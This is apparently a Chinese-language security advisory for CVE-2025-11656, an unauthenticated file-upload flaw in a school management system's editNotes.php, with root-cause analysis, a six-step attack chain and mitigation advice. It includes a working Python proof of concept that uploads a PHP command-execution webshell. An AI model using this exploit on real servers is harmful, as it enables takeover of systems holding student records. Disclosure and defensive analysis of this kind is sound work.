CVE-2025-11656：ProjectsAndPrograms学籍管理系统任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-11656

漏洞类型

任意文件上传（Unrestricted File Upload）

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ProjectsAndPrograms School Management System

漏洞概述

CVE-2025-11656是ProjectsAndPrograms学籍管理系统（School Management System）中存在的一个高危安全漏洞。该漏洞位于系统的/assets/editNotes.php文件中，由于对用户上传的File参数缺乏充分的验证和过滤，攻击者可以通过构造恶意请求实现任意文件上传。该漏洞的CVSS 3.1评分为7.3，属于高危级别。攻击者无需任何身份认证即可远程利用此漏洞，且不需要用户交互即可完成攻击。一旦成功利用，攻击者可以上传WebShell等恶意文件到服务器，从而获取服务器控制权限，对系统的机密性、完整性和可用性均造成威胁。该漏洞的利用代码已经公开披露，进一步增加了系统被攻击的风险。由于该产品未使用版本管理机制，目前无法准确确定受影响和不受影响的版本范围，所有使用该系统的用户均应视为潜在受影响对象。该漏洞已于2025年10月13日公开披露，由[email protected]报告。

技术细节

该漏洞的根本原因在于/assets/editNotes.php文件中的文件上传功能未对用户提交的文件进行严格的安全检查。具体而言，当用户通过POST请求提交File参数时，服务器端代码缺少对上传文件类型的白名单验证、文件扩展名校验、MIME类型检查以及文件内容的合法性审查等关键安全措施。攻击者可以通过以下步骤利用此漏洞：首先，构造一个包含恶意PHP代码的文件（如webshell.php），并将其伪装为正常的笔记文件；然后，通过HTTP POST请求将文件提交至/assets/editNotes.php端点，文件名参数File指向该恶意文件；由于服务器未进行有效验证，恶意文件将被成功上传到Web可访问目录中；最后，攻击者通过浏览器访问上传后的文件URL，即可执行其中的恶意PHP代码，实现远程命令执行。由于该漏洞的攻击向量为网络（AV:N），无需认证（PR:N），无需用户交互（UI:N），且对机密性、完整性和可用性均有低级别影响，因此被评定为高危漏洞。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络搜索或Shodan等工具发现运行ProjectsAndPrograms学籍管理系统的目标服务器，识别/assets/editNotes.php端点。

STEP 2

步骤2：构造恶意文件

攻击者创建一个包含恶意PHP代码的文件（如webshell），用于在服务器上执行任意命令。

STEP 3

步骤3：上传恶意文件

通过HTTP POST请求将恶意文件上传至/assets/editNotes.php，利用未经验证的File参数绕过安全检查。

STEP 4

步骤4：验证上传结果

攻击者通过访问上传后的文件URL，确认恶意文件已成功部署在Web可访问目录中。

STEP 5

步骤5：远程代码执行

通过访问上传的webshell并传递命令参数，攻击者可以在服务器上执行任意系统命令，获取服务器控制权限。

STEP 6

步骤6：权限提升与持久化

攻击者可能进一步尝试权限提升、安装后门或进行横向移动，以维持对系统的长期控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11656 Exploit - Unrestricted File Upload in editNotes.php
# Affected: ProjectsAndPrograms School Management System
# Vulnerable file: /assets/editNotes.php

import requests

TARGET_URL = "http://target-server.com"
UPLOAD_ENDPOINT = "/assets/editNotes.php"

# Create a malicious PHP webshell payload
php_shell_content = """<?php
if (isset($_REQUEST['cmd'])) {
    system($_REQUEST['cmd']);
}
?>"""

# Construct the multipart form-data upload request
files = {
    'File': ('shell.php', php_shell_content, 'application/x-php')
}

# Send the upload request
response = requests.post(
    f"{TARGET_URL}{UPLOAD_ENDPOINT}",
    files=files
)

print(f"Upload Status: {response.status_code}")
print(f"Response: {response.text}")

# After successful upload, access the shell
# shell_url = f"{TARGET_URL}/assets/uploads/shell.php?cmd=id"
# shell_response = requests.get(shell_url)
# print(f"Command execution result: {shell_response.text}")

影响范围

ProjectsAndPrograms School Management System (commit 6b6fae5426044f89c08d0dd101c7fa71f9042a59及之前版本)

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1）通过Web服务器配置限制/assets/editNotes.php端点的访问权限，仅允许授权用户访问；2）在Nginx或Apache中配置规则，禁止上传目录执行PHP等服务器端脚本；3）部署Web应用防火墙（WAF）规则，检测和拦截可疑的文件上传请求；4）监控服务器上传目录的文件变化，及时发现异常文件；5）对系统进行最小权限原则配置，确保Web服务进程以低权限用户运行，限制攻击者利用webshell的影响范围；6）定期检查服务器日志，发现可疑的访问和上传行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11656
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11656
3 Details https://www.cvedetails.com/cve/CVE-2025-11656/
4 VulDB https://vuldb.com/cve/CVE-2025-11656
5 Link https://github.com/qqy-123/cve/issues/1
6 Link https://vuldb.com/?ctiid.328073
7 Link https://vuldb.com/?id.328073
8 Link https://vuldb.com/?submit.665603
9 Link https://github.com/qqy-123/cve/issues/1